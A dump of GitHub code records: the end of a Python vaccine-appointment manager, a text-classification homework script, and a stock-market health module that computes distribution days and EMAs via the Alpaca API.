list(patient_data.keys())\n if dict_keys[0] != \"PatientSystemID\" or dict_keys[1] != \"ContactPhoneNumber\":\n raise VaccineManagementException(\"Wrong json file format\")\n\n good_id = re.compile(r\"[0-9A-Fa-f]{32}\")\n test_id = good_id.fullmatch(patient_data[\"PatientSystemID\"])\n if not test_id:\n raise VaccineManagementException(\"Wrong json file format\")\n\n good_number = re.compile(r\"[0-9]{9}\")\n test_number = good_number.fullmatch(patient_data[\"ContactPhoneNumber\"])\n if not test_number:\n raise VaccineManagementException(\"Wrong json file format\")\n\n # Opens the file that contains the patients to check if it finds the value\n with open(file_store, \"r\", encoding=\"utf-8\", newline=\"\") as file:\n data_list = json.load(file)\n\n client_system_id = patient_data[\"PatientSystemID\"]\n client_phone_number = patient_data[\"ContactPhoneNumber\"]\n\n found = False\n for item in data_list:\n if item[\"_VaccinePatientRegister__patient_sys_id\"] == \\\n client_system_id and item['_VaccinePatientRegister__phone_number'] == \\\n client_phone_number:\n found = True\n guid = item['_VaccinePatientRegister__patient_id']\n break\n if not found:\n raise VaccineManagementException(\"Patient does not exist\")\n\n # It has been found, so we create an instance of VaccinationAppointment\n new_date = VaccinationAppoinment(guid, client_system_id, client_phone_number, 10)\n\n # Checks if the client hasn't got an appointment already\n file_store_date = json_path + \"store_patient_date.json\"\n\n try:\n with open(file_store_date, 'r', encoding=\"utf-8\", newline=\"\") as file:\n data_list = 
json.load(file)\n except FileNotFoundError:\n data_list = []\n except json.JSONDecodeError:\n raise VaccineManagementException(\"JSON Decode Error - Wrong JSON Format\")\n found = False\n for item in data_list:\n if item[\"_VaccinationAppoinment__patient_sys_id\"] == client_system_id:\n found = True\n if found:\n raise VaccineManagementException(\"Error: patient already has an appointment.\")\n ##################################################\n\n # Adding the data to the file\n data_list.append(new_date.__dict__)\n try:\n with open(file_store_date, \"w\", encoding=\"utf-8\", newline=\"\") as file:\n json.dump(data_list, file, indent=2)\n except Exception:\n raise VaccineManagementException(\"Wrong file or path\")\n # print(data_list)\n return new_date.vaccination_signature\n\n\n @freeze_time(\"2022-06-16\") # Freeze time so the tests run deterministically\n def vaccine_patient(self, date_signature, date_for_test=None):\n \"\"\"\n\n Method that validates and searches a patient given a date_signature.\n The date_for_test argument is for testing and is not meant to be used in\n real-life executions.\n\n \"\"\"\n # First we need to validate the date_signature argument\n self.validate_date_signature(date_signature)\n\n # Then we need to check if date_signature exists in store_patient_date\n json_path = str(Path.home()) + \"/PycharmProjects/G80.2022.T10.EG3/src/JsonFiles/\"\n file_store_date = json_path + \"store_patient_date.json\"\n\n # If signature is valid and exists in store_patient_date we check if it already\n # exists in store_vaccine_patient\n try:\n with open(str(json_path)+\"store_vaccine_patient.json\", 'r',\n encoding='utf-8', newline=\"\") as file:\n vaccine_patients = json.load(file)[0]\n if vaccine_patients[date_signature]:\n raise VaccineManagementException(\"Error: Patient has already been vaccinated\")\n except FileNotFoundError:\n pass\n\n # We check if there are any file errors\n try:\n with open(file_store_date, 'r', encoding=\"utf-8\", newline=\"\") as file:\n data_list = json.load(file)\n\n except FileNotFoundError:\n raise VaccineManagementException(\"Error: File not found\")\n\n # Now we traverse the JSON file searching for the date_signature\n date_found = False\n for item in data_list:\n if item[\"_VaccinationAppoinment__date_signature\"] == date_signature:\n date_found = True\n appointment_date = item[\"_VaccinationAppoinment__appoinment_date\"]\n if not date_found:\n raise VaccineManagementException(\"Error: date_signature doesn't exist in the system\")\n\n # If we found date_signature in the JSON file then we\n # need to check if the vaccination date is today\n actual_date = datetime.timestamp(datetime.utcnow())\n if date_for_test is None:\n if actual_date != appointment_date:\n raise VaccineManagementException(\"Error: actual date doesn't match with \"\n \"the issued vaccination date\")\n else:\n if date_for_test != appointment_date:\n raise VaccineManagementException(\"Error: actual date doesn't match with \"\n \"the issued vaccination date\")\n\n # At this point, if the issued_date is equal to actual_date,\n # the system creates a new store with the vaccination data\n try:\n with open(str(json_path+\"store_vaccine_patient.json\"), \"w\",\n encoding=\"utf-8\", newline=\"\") as file:\n json.dump([{str(date_signature): actual_date}], file, indent=2)\n except Exception:\n raise VaccineManagementException(\"Wrong file or path\")\n return True\n
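\n# Illustrative usage sketch (added commentary, not part of the original module): the three\n# public steps above chain together through the identifiers they return. `manager` stands for\n# an instance of the enclosing manager class, whose name is not shown in this excerpt, and the\n# argument values below are hypothetical.\n#\n# patient_sys_id = manager.request_vaccination_id(some_uuid4, \"Regular\",\n#                                                 \"Name Surname\", \"123456789\", \"22\")\n# date_signature = manager.get_vaccine_date(path_to_appointment_request_json)\n# manager.vaccine_patient(date_signature)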
","repo_name":"mario429/G80.2022.T10.EG3","sub_path":"src/main/python/uc3m_care/vaccine_manager.py","file_name":"vaccine_manager.py","file_ext":"py","file_size_in_byte":13122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34765198094","text":"from pandas import read_csv\r\nimport pymorphy2\r\nimport numpy as np\r\nfrom sklearn.feature_extraction.text import HashingVectorizer\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.model_selection import GridSearchCV\r\nfrom sklearn.metrics import accuracy_score, roc_auc_score\r\nfrom sklearn.decomposition import PCA\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn.model_selection import RandomizedSearchCV\r\nglobvar = 0\r\nimport pandas as pd\r\ndef vec(s):\r\n coder.fit_transform(s)\r\ndef f_tokenizer(s):\r\n global globvar # Needed to modify global copy of globvar\r\n globvar += 1\r\n print(globvar)\r\n morph = pymorphy2.MorphAnalyzer()\r\n\r\n t = s.split(' ')\r\n\r\n f = []\r\n for j in t:\r\n m = morph.parse(j.replace('.',''))\r\n if (len(m) != 0):\r\n wrd = m[0]\r\n if wrd.tag.POS not in ('NUMR','PREP','CONJ','PRCL','INTJ'):\r\n f.append(wrd.normal_form)\r\n return f\r\ndf = read_csv(\"D:\\\\MyML\\\\less5\\\\data\\\\train.csv\",sep='\\t')\r\nprint(\"load\")\r\ndftest = df#.head(20)\r\n#dftest['normname']=dftest['name'].map(f_tokenizer)\r\ndftest['data'] = dftest['name']#+\" \" + dftest['description']\r\ncoder = HashingVectorizer(tokenizer=f_tokenizer, n_features=150)\r\nprint(\"convert\")\r\n\r\n\r\n#dftest['vectorname']=dftest['normname'].map(vec)\r\n\r\ndata = dftest['data'].tolist()\r\nmyarray = np.asarray(data)\r\ntrn =coder.fit_transform(myarray)\r\nprint(\"fit\")\r\ni = 0\r\ntarget = dftest['target']\r\n\r\nprint(\"startfit\")\r\n#grid_search = RandomizedSearchCV(model, param_distributions=param_dist,n_iter=n_iter_search, cv=3)\r\n#grid_search.fit(trn, target)\r\n#mymodel = grid_search.best_estimator_\r\nprint(\"===================================================================================\")\r\n#print(grid_search.best_params_)\r\n#print(grid_search.best_score_)\r\nprint(\"===================================================================================\")\r\n#TRNtrain, TRNtest, TARtrain, TARtest = train_test_split(trn, target, test_size=0.25)\r\n#mlymodel = model.fit(TRNtrain, TARtrain)\r\n#print('roc_auc_score: ', roc_auc_score(TARtest, mymodel.predict(TRNtest)))\r\nparams= {'max_features': ['auto', 'sqrt', 'log2', None],\r\n 'max_depth': range(3, 25),\r\n 'criterion': ['gini', 'entropy'],\r\n 'splitter': ['best', 'random'],\r\n 'min_samples_leaf': range(1, 20),\r\n }\r\nmodelC=LogisticRegression(random_state=42,max_iter=20)\r\nparam_grid = {'C': [0.0001,0.001,0.01, 0.1, 1, 10, 100,1000,10000,100000], 'penalty': ['l1', 'l2']}\r\ngrid = GridSearchCV(modelC, cv=3,scoring='roc_auc',param_grid=param_grid)\r\ngrid.fit(trn, target)\r\n#random_search.fit(trn, target)\r\nprint('Best estimator is {} with score {} using params {}'.format(modelC.__class__.__name__, grid.best_score_, grid.best_params_))\r\nprint(\"endfit\")\r\nmymodel = grid.best_estimator_\r\ndft = read_csv(\"D:\\\\MyML\\\\less5\\\\data\\\\test.csv\",sep='\\t')\r\ndft = dft#.head(10)\r\ndft['data'] = dft['name']#+\" \" + dft['description']\r\n\r\ndataTestT = dft['data'].tolist()\r\nmyarrayTestT = np.asarray(dataTestT)\r\nXtest 
=coder.fit_transform(myarrayTestT)\r\n\r\ntarget = mymodel.predict(Xtest)\r\nres = pd.Series(target)\r\ndft['target']=res\r\ndfres=dft[['id','target']]\r\n\r\ndfres.to_csv('D:\\MyML\\\\less5\\\\results2.csv',sep=',', index=False)\r\nprint(\"End\")\r\n","repo_name":"Legatinka1/sfml","sub_path":"hw5.py","file_name":"hw5.py","file_ext":"py","file_size_in_byte":3496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16292709857","text":"#### The Purpose of this file is to look at Market Internals and Metrics which determine the health of the trend.\n#### The file will return different scores which will then be used when managing the portfolio. \n\n#### Low Scores: Suggest trimming profitable positions into strength (2-3 ATR from 21 EMA), cutting low Relative Strength stocks,\n#### and becoming more picky with future entries for the short term. (A bigger emphasis on TML (True Market Leaders) and heavy volume breakouts)\n\n#### High scores: Suggest positions can be swung for longer, portfolio exposure can increase if some of the positions are in profit, and stop-losses get moved up.\n#### Less picky on future entries, with the focus on stocks from the leading sectors.\n\n##Distribution Day: A day where a market index drops by more than .2% with greater volume than the day before. Indicates Institutional selling AKA Distribution.\n##########################################################################################################################################################\n#import alpaca_trade_api as tradeapi\nfrom asyncio.windows_events import NULL\nfrom calendar import week\nfrom unicodedata import name\nfrom alpaca_trade_api.rest import REST, TimeFrame\nimport datetime as dt #to get date\nimport pytz #to get date\nimport math #rounding purposes\nimport web_socket_daily_bar #Needs to be debugged later\nimport pandas as pd \n\n#api_test = REST()\n#import alpaca_trad_api #delete\nimport time\nfrom pytz import timezone\nimport logging #added for logging purposes\nimport logging.handlers #added for logging purposes\n\n#Constants\nPERCENT_TO_BE_DISTRIBUTION = -.2\nLONG_DISTRIBUTION_NUMBER = 25\nSHORT_DISTRIBUTION_NUMBER = 7\n\n#CONSTANT COMPUTATIONS\n#Extra days added to account for weekends and holidays\nLONG_DISTRIBUTION = math.ceil((LONG_DISTRIBUTION_NUMBER *((8/5)) + 10))\nSHORT_DISTRIBUTION = math.ceil((SHORT_DISTRIBUTION_NUMBER *((8/5)) + 10))\n\n#############################################################################################################################################\n#Print Distribution Days for Major Indexes\ndef print_distribution_day(distribution_array):\n print(\"Distribution Day Count($SPY) over last\",LONG_DISTRIBUTION_NUMBER, \" days: \", distribution_array[0])\n print(\"Distribution Day Count($SPY) over last\",SHORT_DISTRIBUTION_NUMBER, \" days: \", distribution_array[1])\n print(\"Distribution Day Count($QQQ) over last\",LONG_DISTRIBUTION_NUMBER, \" days: \", distribution_array[2])\n print(\"Distribution Day Count($QQQ) over last\",SHORT_DISTRIBUTION_NUMBER, \" days: \", distribution_array[3])\n print(\"Distribution Day Count($DIA) over last\",LONG_DISTRIBUTION_NUMBER, \" days: \", distribution_array[4])\n print(\"Distribution Day Count($DIA) over last\",SHORT_DISTRIBUTION_NUMBER, \" days: \", distribution_array[5])\n print(\"Distribution Day Count($IWO) over last\",LONG_DISTRIBUTION_NUMBER, \" days: \", distribution_array[6])\n print(\"Distribution Day Count($IWO) over last\",SHORT_DISTRIBUTION_NUMBER, \" 
days: \", distribution_array[7])\n print(\"Distribution Day Count($IWM) over last\",LONG_DISTRIBUTION_NUMBER, \" days: \", distribution_array[8])\n print(\"Distribution Day Count($IWM) over last\",SHORT_DISTRIBUTION_NUMBER, \" days: \", distribution_array[9])\n\n#FOR TESTING BAR VALUES\ndef print_Close(NUM_DAYS, TICKER_D_BARS):\n length_data = len(TICKER_D_BARS)\n for i in range(length_data):\n print(\"Index: \", i, \"Date: \", TICKER_D_BARS[i].t, \"Close: \", TICKER_D_BARS[i].c )\n############################################################################################################################################\n############################################################################################################################################\n\n\n##Returns Distribution Day Count\ndef get_Distribution_DAY_COUNT(NUM_DAYS, TICKER_D_BARS):\n distribution_days = 0\n\n #Get Start Index\n start_index = (len(TICKER_D_BARS)) - NUM_DAYS\n end_index = (len(TICKER_D_BARS)) - 1\n\n #Iterate from the start index to the end index\n for i in range(start_index, end_index):\n #Calculate the percentage change from yesterday's close\n change_percent = ((((TICKER_D_BARS[i+1].c) - (TICKER_D_BARS[i].c)) / (TICKER_D_BARS[i].c))) * 100\n\n # If the index dropped by more than .2%, compare today's volume with yesterday's\n if(change_percent <= PERCENT_TO_BE_DISTRIBUTION):\n if((TICKER_D_BARS[i+1].v - (TICKER_D_BARS[i].v)) > 0): \n distribution_days = distribution_days + 1\n \n\n return distribution_days\n#############################################################################################################################################\n
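# Illustrative self-check (added example, not from the original repository): exercises\n# get_Distribution_DAY_COUNT() with stand-in bar objects. _FakeBar is hypothetical; real\n# bars come from api.get_bars() and expose .c (close) and .v (volume) the same way.\nclass _FakeBar:\n def __init__(self, c, v):\n self.c = c\n self.v = v\n\ndef _example_distribution_count():\n bars = [_FakeBar(100.0, 1000), _FakeBar(99.5, 1200), _FakeBar(99.6, 900), _FakeBar(99.0, 1500)]\n # Bars 2 and 4 each close more than .2% lower on rising volume, so the expected count is 2\n return get_Distribution_DAY_COUNT(4, bars)\n#############################################################################################################################################\n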
#Main function in file\ndef get_distribution_health(api, group):\n \n ###################################################################################\n ###################################################################################\n #calculate Distribution Day Count for Major Indexes ($SPY, $QQQ, $DIA, $IWO, $IWM)\n # over a longer period (currently the last 25 days) and over a shorter period (last 7 days)\n ###################################################################################\n ###################################################################################\n\n #Calculate start_time since get_bars works in reverse for get_bars (V2 endpoint)\n #Reference https://forum.alpaca.markets/t/get-bars-vs-get-barset/8127/6\n timeNow = dt.datetime.now(pytz.timezone('US/Eastern'))\n start_time_long_distribution = timeNow - dt.timedelta(days=LONG_DISTRIBUTION)\n \n #for every stock in the group, calculate Distribution Day Count. Used primarily for Major Indexes ($SPY, $QQQ, $DIA, $IWO, $IWM)\n # over a longer period (currently the last 25 days) and over a shorter period (last 7 days)\n for stock in group.stock_objects_array:\n\n #logging message to print names being processed\n temp_string = \"DATA BEING COLLECTED FOR \" + stock.name + \" object ******\"\n logging.info(temp_string)\n \n #Get DAILY BARS for stock\n temp_D_BARSET = api.get_bars(stock.name, TimeFrame.Day, start = start_time_long_distribution.isoformat(), end = None, limit = LONG_DISTRIBUTION)\n\n # Calculate Short and Long Distribution Day Count\n # Populate Stock object with the Long Distribution and Short Distribution Count\n stock.distribution_Long_len = get_Distribution_DAY_COUNT(LONG_DISTRIBUTION_NUMBER, temp_D_BARSET)\n stock.distribution_Short_len = get_Distribution_DAY_COUNT(SHORT_DISTRIBUTION_NUMBER, temp_D_BARSET)\n \n #Clear Temp Arrays\n temp_D_BARSET = [] \n\n############################################################################################################################## \n##############################################################################################################################\n#GET 9 EMA AND 21 EMA on DAILY CHART\ndef get_ema_health(api, group):\n\n #Constants\n SHORT_EMA = 9\n LONG_EMA = 21\n\n #Computations to get extra bars since get_bars() will count weekends and holidays as a day\n #math.ceil((LONG_DISTRIBUTION_NUMBER *((7/5)) + 10))\n DATA_PERIOD = math.ceil((((LONG_EMA * 2) * (7/5)) + 10))\n timeNow = dt.datetime.now(pytz.timezone('US/Eastern'))\n start_time_long_emas = timeNow - dt.timedelta(days=DATA_PERIOD)\n start_time_hours = (timeNow - dt.timedelta(hours=60)).isoformat()\n\n \n #Iterate through the list of stocks in the group and get EMA health\n for stock in group.stock_objects_array:\n\n #Get Daily bar data then parse only the Closes\n temp_D_BARSET = api.get_bars(stock.name, TimeFrame.Day, start = start_time_long_emas.isoformat(), end = None, limit = DATA_PERIOD)\n temp_EMA_C = parse_closes(temp_D_BARSET)\n\n #Get an Estimate of the Current Price Right Now (AKA today's current close) and parse only candle closes\n last_few_hours_temp = api.get_bars(stock.name, TimeFrame.Hour, start = start_time_hours, end = None, limit = 60)\n last_few_hours_temp_C = parse_closes(last_few_hours_temp)\n\n #Get Most Current Hourly Close and append to dataset\n len_temp = len(last_few_hours_temp_C)\n temp_price_now = last_few_hours_temp_C[len_temp - 1]\n temp_EMA_C.append(temp_price_now)\n\n #Compute Long and Short EMA arrays for each index and populate stock object with current EMA data\n\n temp_EMA_21_array = ema(temp_EMA_C, LONG_EMA)\n temp_EMA_9_array = ema(temp_EMA_C, SHORT_EMA)\n\n stock.EMA_21 = temp_EMA_21_array[len(temp_EMA_21_array) - 1]\n stock.EMA_9 = temp_EMA_9_array[len(temp_EMA_9_array) - 1]\n\n #Clear temp arrays and variables\n del temp_D_BARSET,temp_EMA_C, last_few_hours_temp, last_few_hours_temp_C, len_temp, temp_price_now, temp_EMA_21_array, temp_EMA_9_array\n\n\n########################################################################################################################\n########################################################################################################################\n### Parse Closing Data ##########\ndef parse_closes(RAW_DATA):\n temp_array = []\n \n for i in range((len(RAW_DATA)) -1):\n temp_array.append(RAW_DATA[i].c)\n\n return temp_array\n################################################################################################################\n
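# Worked example (added commentary, not from the original repository): the ema() helper\n# defined below seeds with an n-period SMA and then applies\n# EMA_now = (price_now - EMA_prev) * multiplier + EMA_prev, with multiplier = 2 / (n + 1).\ndef _example_ema():\n # For s = [1, 2, 3, 4, 5] and n = 3: SMA seed = 2.0 and multiplier = 0.5,\n # then (4 - 2) * 0.5 + 2 = 3.0 and (5 - 3) * 0.5 + 3 = 4.0\n return ema([1, 2, 3, 4, 5], 3) # -> [2.0, 3.0, 4.0]\n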
########################################################################################################################\n\n\n################################################################################################################\n#Function TAKEN FROM https://stackoverflow.com/questions/488670/calculate-exponential-moving-average-in-python\ndef ema(s, n):\n \"\"\"\n returns an n period exponential moving average for\n the time series s\n\n s is a list ordered from oldest (index 0) to most\n recent (index -1)\n n is an integer\n\n returns a numeric array of the exponential\n moving average\n \"\"\"\n #s = array(s)\n ema = []\n j = 1\n\n #get n sma first and calculate the next n period ema\n sma = sum(s[:n]) / n\n multiplier = 2 / float(1 + n)\n ema.append(sma)\n\n #EMA(current) = ( (Price(current) - EMA(prev) ) x Multiplier) + EMA(prev)\n ema.append(( (s[n] - sma) * multiplier) + sma)\n\n #now calculate the rest of the values\n for i in s[n+1:]:\n tmp = ( (i - ema[j]) * multiplier) + ema[j]\n j = j + 1\n ema.append(tmp)\n\n return ema\n ################################################################################################################\n ################################################################################################################\n\ndef get_price_estimate(api, group):\n\n # Check if the market is open now. Code From Reference\n #Reference: https://alpaca.markets/deprecated/docs/api-documentation/how-to/market-hours/#:~:text=See%20if%20the%20Market%20is,closed%20on%20a%20particular%20date.\n clock = api.get_clock()\n timeNow = dt.datetime.now(pytz.timezone('US/Eastern'))\n\n #Determine if the market is OPEN or CLOSED\n #If the market is OPEN, pull the most recent minute candles\n if(clock.is_open):\n logging.info(\"Algorithm Determined Market is OPEN from:get_price_estimate()\")\n\n #Iterate through the list of stocks in the group and get the most recent MINUTE close. Store attribute as current_price_estimate \n for stock in group.stock_objects_array:\n start_time_hours = (timeNow - dt.timedelta(hours=1)).isoformat()\n\n last_few_hours_temp = api.get_bars(stock.name, TimeFrame.Minute, start = start_time_hours, end = None, limit = 120)\n last_few_hours_temp_C = parse_closes(last_few_hours_temp)\n len_temp = len(last_few_hours_temp_C) \n stock.current_price_estimate = last_few_hours_temp_C[len_temp - 1]\n\n del start_time_hours, last_few_hours_temp, last_few_hours_temp_C, len_temp\n \n #If the market is CLOSED, pull the most recent hour candles. Make sure that if it is Sunday we can still pull Friday's data\n else:\n logging.info(\"Algorithm Determined Market is CLOSED from:get_price_estimate()\")\n \n #Iterate through the list of stocks in the group and get the most recent HOUR close. 
Store attribute as current_price_estimate \n for stock in group.stock_objects_array:\n start_time_hours = (timeNow - dt.timedelta(hours=60)).isoformat()\n\n last_few_hours_temp = api.get_bars(stock.name, TimeFrame.Hour, start = start_time_hours, end = None, limit = 60)\n last_few_hours_temp_C = parse_closes(last_few_hours_temp)\n len_temp = len(last_few_hours_temp_C) \n stock.current_price_estimate = last_few_hours_temp_C[len_temp - 1]\n\n del start_time_hours, last_few_hours_temp, last_few_hours_temp_C, len_temp\n\n################################################################################################################\n################################################################################################################\n### Get Daily Bars Helper function for a specific stock\ndef get_Dataset_D(api, stock, DATA_PERIOD = 260):\n\n timeNow = dt.datetime.now(pytz.timezone('US/Eastern'))\n start_time = timeNow - dt.timedelta(days=DATA_PERIOD)\n start_time_hours = (timeNow - dt.timedelta(hours=60)).isoformat()\n\n #Determine the Daily trend by pulling daily bars\n temp_D_BARSET = api.get_bars(stock.name, TimeFrame.Day, start = start_time.isoformat(), end = None, limit = DATA_PERIOD)\n temp_D_BARSET_PARSED = parse_closes(temp_D_BARSET)\n\n last_few_hours_temp = api.get_bars(stock.name, TimeFrame.Hour, start = start_time_hours, end = None, limit = 60)\n last_few_hours_temp_C = parse_closes(last_few_hours_temp)\n\n #Get Most Current Hourly Close and append to dataset\n len_temp = len(last_few_hours_temp_C)\n temp_price_now = last_few_hours_temp_C[len_temp - 1]\n temp_D_BARSET_PARSED.append(temp_price_now)\n\n #Store attribute and return dataset\n stock.dataset = temp_D_BARSET_PARSED\n return temp_D_BARSET_PARSED\n\n################################################################################################################\ndef get_Dataset_W(api, stock, DATA_PERIOD = 100):\n timeNow = dt.datetime.now(pytz.timezone('US/Eastern'))\n start_time = timeNow - dt.timedelta(weeks=DATA_PERIOD)\n start_time_hours = (timeNow - dt.timedelta(hours=60)).isoformat()\n\n #Determine the Weekly trend by pulling weekly bars\n temp_W_BARSET = api.get_bars(stock.name, TimeFrame.Week, start = start_time.isoformat(), end = None, limit = DATA_PERIOD)\n temp_W_BARSET_PARSED = parse_closes(temp_W_BARSET)\n\n last_few_hours_temp = api.get_bars(stock.name, TimeFrame.Hour, start = start_time_hours, end = None, limit = 60)\n last_few_hours_temp_C = parse_closes(last_few_hours_temp)\n\n #Get Most Current Hourly Close and append to dataset\n len_temp = len(last_few_hours_temp_C)\n temp_price_now = last_few_hours_temp_C[len_temp - 1]\n temp_W_BARSET_PARSED.append(temp_price_now)\n\n #Store attribute and return dataset\n stock.dataset = temp_W_BARSET_PARSED\n return temp_W_BARSET_PARSED\n\n\n################################################################################################################\ndef get_Dataset_3D(api, stock, DATA_PERIOD = 780):\n timeNow = dt.datetime.now(pytz.timezone('US/Eastern'))\n start_time = timeNow - dt.timedelta(days=DATA_PERIOD)\n start_time_hours = (timeNow - dt.timedelta(hours=60)).isoformat()\n\n #Determine the 3 Day trend by pulling daily bars and taking every third\n temp_3D_BARSET = api.get_bars(stock.name, TimeFrame.Day, start = start_time.isoformat(), end = None, limit = DATA_PERIOD)\n temp_3D_BARSET_PARSED = parse_closes(temp_3D_BARSET)\n\n last_few_hours_temp = api.get_bars(stock.name, TimeFrame.Hour, start = start_time_hours, end = None, limit = 60)\n last_few_hours_temp_C = 
parse_closes(last_few_hours_temp)\n\n #Get Most Current Hourly Close and append to dataset\n len_temp = len(last_few_hours_temp_C)\n temp_price_now = last_few_hours_temp_C[len_temp - 1]\n temp_3D_BARSET_PARSED.append(temp_price_now)\n\n #Store attribute and return dataset\n new_data = skip_parse(interval = 3, data = temp_3D_BARSET_PARSED)\n #stock.dataset = temp_3D_BARSET_PARSED\n return new_data\n\n\n################################################################################################################\n###### Gets the baset for the Hourly or Minute Timeframe ####\ndef get_Dataset_IntraDay(api, stock, DATA_PERIOD = 260, temp_timeframe = \"Hour\"):\n\n timeNow = dt.datetime.now(pytz.timezone('US/Eastern'))\n start_time_hours = None\n timeframe = None\n\n #Determine what start time should be based on timeframe. Pull extra bars for one minute timeframe in case we are computing after hours\n\n if(temp_timeframe == \"Hour\"):\n start_time_hours = (timeNow - dt.timedelta(hours=DATA_PERIOD)).isoformat()\n timeframe = TimeFrame.Hour\n\n elif(temp_timeframe == \"30min\"):\n start_time_hours = (timeNow - dt.timedelta(hours=DATA_PERIOD)).isoformat()\n timeframe = TimeFrame.Minute\n \n elif(temp_timeframe == \"15min\"):\n start_time_hours = (timeNow - dt.timedelta(hours= (DATA_PERIOD / 2))).isoformat()\n timeframe = TimeFrame.Minute\n\n elif(temp_timeframe == \"5min\"):\n start_time_hours = (timeNow - dt.timedelta(hours= (DATA_PERIOD / 4))).isoformat()\n timeframe = TimeFrame.Minute\n\n elif(temp_timeframe == \"1min\"):\n DATA_PERIOD = DATA_PERIOD\n start_time_hours = (timeNow - dt.timedelta(hours=(DATA_PERIOD / 60))).isoformat()\n timeframe = TimeFrame.Minute\n else:\n temp_error = \"timeframe in get_Dataset_IntraDay() is: \" + temp_timeframe\n logging.error(temp_error)\n logging.error(\"Timeframe in get_Dataset_IntraDay() Not Recognized\")\n\n\n #Determine IntraDay Trend bars for that timeframe\n temp_intra_BARSET = api.get_bars(stock.name, timeframe, start = start_time_hours, end = None) #limit = DATA_PERIOD)\n\n temp_intra_BARSET_MARKET = [] #declare variable\n\n #Get rid of pre/post market data. Keep only market data during market hours between 09:30 and 16:00. 
\n #Combine minute candles for 30min, 15 min, and 5 min\n if(temp_timeframe == \"Hour\" or temp_timeframe == \"30min\" or temp_timeframe == \"15min\" or temp_timeframe == \"5min\"):\n temp_intra_BARSET_MARKET = only_market_hours(temp_intra_BARSET, timeframe = temp_timeframe)\n \n elif(temp_timeframe == \"1min\"):\n #parse closes\n temp_intra_BARSET_MARKET = parse_closes(temp_intra_BARSET)\n \n else:\n logging.error(\"ERROR with timeframe in get_Dataset_IntraDay\")\n\n #Store attribute and return dataset\n stock.dataset = temp_intra_BARSET_MARKET\n return temp_intra_BARSET_MARKET\n\n###################################################################################################################\n###################################################################################################################\n#Removes pre/post market data leaving only market data.\n#In addition if the timeframe is 5min, 15 min, or 30min combine the 1 min candles to form larger timeframe candle\ndef only_market_hours(RAW_DATA, timeframe):\n\n parsed_array = []\n #Get rid of pre market and post-market data points and return an array of closing prices\n df_data = (RAW_DATA.df)\n new_df_data = df_data.between_time('09:30' , '16:00')\n\n #Convert datatframe to array\n #If timeframe is Hour go from dataframe -> Array\n if(timeframe == \"Hour\"):\n parsed_array = new_df_data.loc[:]['close'].values\n\n #If timeframe is 30min use for loop to pull 30 min closes\n elif(timeframe == \"30min\"):\n\n parsed_array = new_df_data.iloc[::30, :]['close'].values\n \n \n #Get rid of 0th index, and append current price to end\n #parsed_array.pop(0)\n #parsed_array.append(RAW_DATA[len(RAW_DATA) - 1].c) \n #print(parsed_array)\n #print(\"type is:\", type(parsed_array))\n\n #If timeframe is 15min use for loop to pull 30 min closes\n #elif(timeframe == \"15min\"):\n #for i in range(15 - 1, len(new_df_data.columns) - 1, 15):\n #parsed_array = new_df_data.loc[i]['close'].values\n\n #If timeframe is 15min use for loop to pull 30 min closes\n #elif(timeframe == \"5min\"):\n #for i in range(5 - 1, len(new_df_data.columns) - 1, 5):\n #parsed_array = new_df_data.loc[i]['close'].values\n\n #else:\n #error_string = \"Timeframe not recognized in only_market_hours() in markethealth.py. 
Timeframe is: \" + timeframe\n #logging.error(error_string)\n\n return parsed_array\n\n\n################################################################################################################\n################################################################################################################\n#Parses data by skipping by interval and removing data not needed to get custom timeframes\ndef skip_parse(interval = 3, data = None):\n \n parsed_data = []\n\n #Take a data point every interval length\n for i in range(0, len(data) - 1, interval):\n parsed_data.append(data[i])\n\n #Take the final (partial/current) data point if it has not been taken yet\n parsed_data.append(data[len(data) - 1])\n\n return parsed_data\n\n#### Initializes the timeframe, the dataset for that timeframe (candle closes), and clears markers\ndef initialize_trend_data(stock_obj, timeframe_string, dataset):\n \n #Manually set timeframe and initialize via function\n stock_obj.current_timeframe_string = timeframe_string\n stock_obj.set_timeframe_initial()\n\n #Set dataset\n del stock_obj.dataset\n stock_obj.dataset = dataset\n\n################################################################################################################\n################################################################################################################\n\n### Use historical data to determine the current trend on specified timeframe(s) ####\ndef get_starting_trends(api, group):\n\n #Function Constants (Amount of bars taken for computations)\n DATA_PERIOD_DAY = 260 \n\n #For each stock start by getting Daily Data Set\n for stock_obj in group.stock_objects_array:\n\n dataset_daily = get_Dataset_D(api, stock_obj, DATA_PERIOD_DAY)\n initialize_trend_data(stock_obj, \"Day\", dataset_daily)\n stock_obj.determine_ititial_trend()\n\n #####################################################################\n #For each stock Get Hourly Timeframe\n for stock_obj in group.stock_objects_array:\n\n dataset_hourly = get_Dataset_IntraDay(api, stock_obj, DATA_PERIOD_DAY * 3, \"Hour\")\n initialize_trend_data(stock_obj, \"Hour\", dataset_hourly)\n stock_obj.determine_ititial_trend()\n\n #####################################################################\n #For each stock Get Minute Timeframe\n for stock_obj in group.stock_objects_array:\n\n dataset_min = get_Dataset_IntraDay(api, stock_obj, DATA_PERIOD_DAY * 3, \"1min\")\n initialize_trend_data(stock_obj, \"1min\", dataset_min)\n stock_obj.determine_ititial_trend()\n\n ###############################################################################\n ##### CONSTRUCTION START ################################################\n #For each stock start by getting Weekly Data Set\n for stock_obj in group.stock_objects_array:\n\n dataset_weekly = get_Dataset_W(api, stock_obj, 100)\n initialize_trend_data(stock_obj, \"Week\", dataset_weekly)\n stock_obj.determine_ititial_trend()\n\n #3D Dataset\n for stock_obj in group.stock_objects_array:\n \n dataset_3D = get_Dataset_3D(api, stock_obj, DATA_PERIOD_DAY * 3)\n initialize_trend_data(stock_obj, \"3D\", dataset_3D)\n stock_obj.determine_ititial_trend()\n\n #30 Min Dataset\n for stock_obj in group.stock_objects_array:\n\n dataset_30min = get_Dataset_IntraDay(api, stock_obj, 1000, \"30min\")\n\n print(\"!!!!@@@@: size of array is\", len(dataset_30min))\n\n initialize_trend_data(stock_obj, \"30min\", dataset_30min)\n stock_obj.determine_ititial_trend()\n\n #15 Min Dataset\n #for stock_obj in group.stock_objects_array:\n\n #dataset_15min = 
